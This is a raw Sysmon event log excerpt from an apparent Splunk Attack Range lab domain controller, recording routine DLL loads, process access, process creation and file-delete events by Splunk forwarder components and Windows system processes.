Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000101135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000101134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000101133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000101132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000101131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000101130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000101129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000101128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000101127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000101126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000101125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000101124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000101123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000101122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000101121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000101120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000101119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000101118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000101117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000101116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000101114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000101113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 10341000x8000000000000000101112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x8000000000000000101110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000101106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.578{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000101105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.579{326FD73D-C1A3-6294-500B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000101104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.062{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000101103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.062{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000101102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:47.062{326FD73D-C1A2-6294-4F0B-000000005502}1688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000101101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:46.999{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F46643BA2D9C5B464C2A24D4BFF156A0,SHA256=96B69A2978CA826CD3EC73C783C72B4020EE5DB94CE3EE1962CFF267F93C9899,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000101158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:48.062{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=6AD4BE73F7AEAAFDEE15894CE7F03D76,SHA256=A0F4E54B524AF0BC790AC60E090FD4AFC3B9CD6DE47EEB209544E33A4B760786,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space